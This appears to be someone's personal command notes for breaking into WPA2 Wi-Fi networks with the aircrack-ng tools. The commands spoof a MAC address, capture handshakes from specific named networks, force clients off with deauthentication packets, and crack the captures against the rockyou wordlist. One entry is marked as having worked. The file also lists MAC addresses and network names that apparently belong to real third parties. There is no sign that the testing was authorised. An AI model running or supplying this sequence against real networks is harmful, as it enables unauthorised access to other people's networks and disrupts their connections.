ifconfig
ifconfig wlan0 down

### macchanger -m 00:11:22:33:44:55 wlan0

ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng check kill
airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng -c 4 --bssid 00:27:22:4C:37:EA -w /home/rev/Documents/hck/3b/net_at_home/ wlan0mon

aireplay-ng -0 10 -a 00:27:22:4C:37:EA wlan0mon

aircrack-ng -a2 -b ::::: -w /home/rev/Documents/hck/rockyou.txt /home/rev/Documents/hck/test/*.cap

aircrack-ng -a2 -b 00:27:22:4C:37:EA -w /home/rev/Documents/hck/rockyou.txt /home/rev/Documents/hck/3b/net_at_home/*.cap

#### /usr/share/wordlists

 00:1A:2B:5E:E5:FB  -56        9       51    0  11  54e  WPA2 CCMP   PSK  Daniel                               


## WORKS

aircrack-ng -a2 -b FC:4A:E9:49:DE:93 -w /home/rev/Documents/hck/rockyou.txt /home/rev/Documents/hck/3b/last_king/-03.cap

## house_of_changes
aircrack-ng -a2 -b FC:4A:E9:3E:E3:E2 -w /home/rev/Documents/hck/rockyou.txt /home/rev/Documents/hck/3b/house_of_changes/*.cap


 00:1A:2B:61:F2:B9  10:D5:42:5B:4A:57  -63    0 - 1e     0       23  Cloud,tyrinny,tyranny1267,nicol,baliach,fre
